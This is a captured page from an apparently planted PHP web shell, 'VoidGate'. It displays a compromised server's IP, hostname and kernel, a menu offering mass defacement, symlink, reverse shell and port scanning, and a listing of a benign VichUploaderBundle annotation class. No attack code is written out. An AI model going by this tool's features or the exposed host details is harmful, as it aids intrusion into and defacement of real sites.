ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
vich
/
uploader-bundle
/
src
/
Mapping
/
Annotation
/
Viewing: UploadableField.php
<?php namespace Vich\UploaderBundle\Mapping\Annotation; use Doctrine\Common\Annotations\Annotation\NamedArgumentConstructor; use Vich\UploaderBundle\Mapping\AnnotationInterface; /** * UploadableField. * * @Annotation * @Target({"PROPERTY"}) * @NamedArgumentConstructor * * @author Dustin Dobervich <ddobervich@gmail.com> * @final */ #[\Attribute(\Attribute::TARGET_PROPERTY)] class UploadableField implements AnnotationInterface { /** * @var string */ protected $mapping; /** * @var string */ protected $fileNameProperty; //TODO: replace "fileNameProperty" with just "name" /** * @var string */ protected $size; /** * @var string */ protected $mimeType; /** * @var string */ protected $originalName; /** * @var string */ protected $dimensions; /** * Constructs a new instance of UploadableField. */ public function __construct( string $mapping, string $fileNameProperty = null, string $size = null, string $mimeType = null, string $originalName = null, string $dimensions = null ) { $this->mapping = $mapping; $this->fileNameProperty = $fileNameProperty; $this->size = $size; $this->mimeType = $mimeType; $this->originalName = $originalName; $this->dimensions = $dimensions; } /** * Gets the mapping name. * * @return string The mapping name */ public function getMapping(): string { return $this->mapping; } /** * Gets the file name property. * * @return string|null The file name property */ public function getFileNameProperty(): ?string { return $this->fileNameProperty; } public function getSize(): ?string { return $this->size; } public function getMimeType(): ?string { return $this->mimeType; } public function getOriginalName(): ?string { return $this->originalName; } public function getDimensions(): ?string { return $this->dimensions; } }
Coded With 💗 by
0x6ick